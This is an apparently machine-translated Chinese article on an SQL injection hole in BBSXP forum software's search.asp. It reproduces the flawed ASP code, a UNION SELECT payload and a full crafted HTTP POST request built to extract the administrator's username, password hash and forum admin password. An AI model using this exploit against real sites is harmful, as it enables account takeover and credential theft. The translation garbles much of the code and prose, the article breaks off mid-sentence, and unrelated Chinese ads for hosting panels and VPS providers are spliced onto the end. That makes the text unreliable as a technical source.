bbsxp注入漏洞BBSXP injection vulnerability
BBSXP injection vulnerability
BBSXP injection vulnerability
The newBBSXP injection vulnerability reappearance, can get theadministrator account password directly
-- I found a summary of the bbsxp5 sp1 vulnerability
There was an article about BBSXP in the early days of themagazine. It was a Cookie injection attack. The author wasingenious and could think of a logical loophole.
After reading the article, the school did not read the code.Having nothing to do during the summer vacation, I downloadedthe latest version of BBSXP and read it.
BBSXP is really small and small, and the file is short and short,but it' s a bit different from a DVBBS, whether it' s a functionor an interface.
But it' s a little bit of a flaw, after three years of testing.One. Search for loopholes
BBS to string input with HTMLEncode conversion, the numerictype with int function adjustment, Isnumeric functionjudgment.
Obviously there are Numbers and strings in the query that must
not be used as input values. You can't input as a value, whydo you enter it?
That' s the crux of the matter. I scanned each file with thisidea, and it took a long time to get to search. Asp
(seem to have had a loophole before, changed the original buthave a new) found a loophole, look at the code together.<! - # include file = "setup. Asp" -- >
The < %top
If request.cookies (" username ") = empty then error (" < li >you haven' t < a href = login.asp > login ")
DetectPost
If the Request (" menu ") = "ok" then
Search = Request (" search ")
Forumid forumid = Request (" ")
TimeLimit = Request (" TimeLimit ")
The content = the HTMLEncode (Request (" content ") )
Searchxm= the HTMLEncode (Request (" searchxm "))
Searchxm2 = the HTMLEncode (Request (" searchxm2 ") )
Searchxm2 = replace (searchxm2, "@", "&")
If the content = empty then the content = Request. Cookies ("u sername ")
If isnumeric (" "&forumid&" ") then forumidor = "forumid ="& "forumid &" "and"
If the search = "author" then
The item = "&" searchxm& "= ' " & the content &" "
Elseif search = "key" then
The item= "&" searchxm2 & "like '%" & the content &%' ""End the if
If TimeLimit < > "" then TimeLimitList =" and lasttime > "&SqlNowString &" -"
SQL = "select top" &MaxSearch& "* from forum where deltopic< > 1 and" & forumidor & "" &" "&" "&" & "&" & "&" & "&" "&""
"& TimeLimitList &" order by lasttime Desc"
Rs. The Open SQL, Conn, 1
. . . . . .
Let' s take a closer look at SQL = "select top" &MaxSearch. . .This one, where MaxSearch is defined, the default value is 500,We're left with 3 out of the outside.
1. If isnumeric (" "& forumid&" ") then forumidor = "forumid=" & "forumid &" "and"
As long as the forumid input is empty, forumidor is empty.
2. If TimeLimit < > ", "then TimeLimitList =" and lasttime >"& SqlNowString &" & int "(TimeLimit) &" "
TimeLimit is an integer, input (enter a 1) , then TimeLimitListbecomes "and lasttime > now () -1",
Change to "and lasttime > getdate () -1" in MSSQL.
3. If the search = "author" then
The item= "&" searchxm& "= ' " & the content &" "
Elseif search = "key" then
The item= "&" searchxm2 & "like '%" & the content &%' ""End the if
As long as the search = "author",
If the content is arbitrary input (to lose a abcd) , then item= HTMLEncode (searchxm) = 'abcd' ,
As soon as we construct the input and pass the above statement,the SQL statement becomes:
Select top 500*from forum where deltopic < > 1 and [HTMLEncode(searchxm) ] = 'abcd'
And lasttime > now () - 1 order by lasttime Desc
There are no single quotes around the brackets enclosed inbrackets, and obviously it can be used.
Let' s look at the HTMLEncode function first
The function the HTMLEncode (fString)
FString = replace (fString, "; ", "& # 59;")
FString = server. The htmlencode (fString)
FString = replace (fString, "' ", "& # 39;")
FString = replace (fString, "-", "& # 45; & # 45;")
FString = replace (fString, "", " the & # 92; ")
FString = replace (fString, vbCrlf, "< br >")
The HTMLEncode = fString
End the function
The filter is filtered, and the filter is very tight. Theprogrammer is also very difficult, and the filter is more thanlikely to affect the use.
There are fewer safety problems. So how do we use this filter?Naturally, you have to guess,
It is a feasible method, and the structure of the table is alsoknown, and it is easy to guess. But I' ll do it in a simple way.Two. Exploit
It is also valid for both ACCESS and MSSQL with a familiar unionquery. I'mnot going to write it, just to show you the results.Select top 500 * from forum where deltopic < > 1 and
The forumid= 0 union all select top 1, 1, [user] . Username astopic, forum. Use
Rname, content, forum. Posttime forum. Postip, 1, 1, 1, 1, 1, 1, 1,[user] . Userpass as lastname,
Lasttime, polltopic clubconfig. Adminpassword as pollresult,1 the from
[user], forum, clubconfig where [user] . Membercode=5 or forum.Id = 0 or clubconfig.adminpassword
= 'abcd' and lasttime > now () - 1 order by lasttime DescThe color part is the value of the searchxm we want to enter,and each character HTMLEncode function in the middle is notf iltered.
And the implication of this statement is that the statement infront of the union is false, because the forumid cannot be 0,The union only queries a record that contains theadministrator' s user name and encryption password, as well asthe encrypted password for community management.
The friend who knows the SQL statement will see it.
The number 1 does not make sense, just to match the type of thefield, ensuring that the number of fields before and after theunion is consistent with the type.
Here you can construct your own queries, and I give you areference.
Construct the input statement and construct the submission.Think of the classic WSE, if anyone thinks that you can writeyour own submit strings for the HTTP protocol,
I should also advise him to save energy and brain power.
(figure 1)
[2]
The construction is submitted as follows:
POST/BBSXP/search. Asp? The menu = ok HTTP / 1. 1
Accept: image/GIF, image/x-xbitmap, image/jpeg, image/pjpeg,appl ication/x- shockwave - f lash, appl ication/VND. Ms-excel,Appl ication/VND. - ms powerpoint, application/msword, * / *Referer: http://localhost:8000/bbsxp/search.asp
The Accept - Language: useful - cn
The content-type: application/x - WWW - form - urlencodedThe Accept - Encoding: gzip, deflate
The user-agent: Mozilla / 4.
0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE2)
Host: localhost: 8000
The Content - Length: 481
Connection: Keep Alive
The cache-control: no - Cache
Cookie: eremite = 0; Userpass =
E80B5017098950FC58AAD83C8C14978E; The username=admin; Skins= 1; ASPSESSIONIDSSRQSDTB =
OGLJMADCECKAFKGCPCCHBKHO; On l inet i me=2 d8%2004%2 d 13+2004%3 a08%3 a33; Addmin = 0
The content = fsaf&search = author&searchxm 20 forumid = % %3 d0 +union+all + select + top 1%+ 1 +2 c1 5 buser%2 c %%5 d.
Username + + topic as %2 cforum. The username% 2 ccontent %2 cforum. Posttime %2 cforum. Postip%2 c1%2 c1%2 c1%2 c1%2C1%2 C1%2 C1%2 c%5 buser%5 d. The userpass +as + lastname%2 clasttime%2 cpolltopic%2 cclubconfig. Adminpassword+ as+ pollresult % 2 c1 + from + % 5 buser cforum% 2 c % 5 d % 2Clubconfig +where + 5 buser % % 5 d. The membercode % 3 d5 +or + forum.
Id % 3 d0 + or + clubconf ig. Adminpassword&searchxm 2 =topic&TimeLimit = & forumid = & submit 1 = % BF % % % AA % CABC
CB % % % CB D1 F7
I've written an HTML page for the searchxm part, which can be
我们一般的站长或者企业服务器配置WEB环境会用到免费版本的宝塔面板。但是如果我们需要较多的付费插件扩展,或者是有需要企业功能应用的,短期来说我们可能选择按件按月付费的比较好,但是如果我们长期使用的话,有些网友认为选择宝塔面板企业版或者专业版是比较划算的。这样在年中大促618的时候,我们也可以看到宝塔面板也有发布促销活动。企业版年付899元,专业版永久授权1888元起步。对于有需要的网友来说,还是值...
物语云计算怎么样?物语云计算(MonogatariCloud)是一家成立于2016年的老牌国人商家,主营国内游戏高防独服业务,拥有多家机房资源,产品质量过硬,颇有一定口碑。本次带来的是特惠活动为美国洛杉矶Cera机房的不限流量大带宽VPS,去程直连回程4837,支持免费安装Windows系统。值得注意的是,物语云采用的虚拟化技术为Hyper-v,因此并不会超售超开。一、物语云官网点击此处进入物语云...
俄罗斯vps云服务器商家推荐!俄罗斯VPS,也叫毛子主机(毛子vps),因为俄罗斯离中国大陆比较近,所以俄罗斯VPS的延迟会比较低,国内用户也不少,例如新西伯利亚机房和莫斯科机房都是比较热门的俄罗斯机房。这里为大家整理推荐一些好用的俄罗斯VPS云服务器,这里主要推荐这三家:justhost、ruvds、justg等俄罗斯vps主机,方便大家对比购买适合自己的俄罗斯VPS。一、俄罗斯VPS介绍俄罗斯...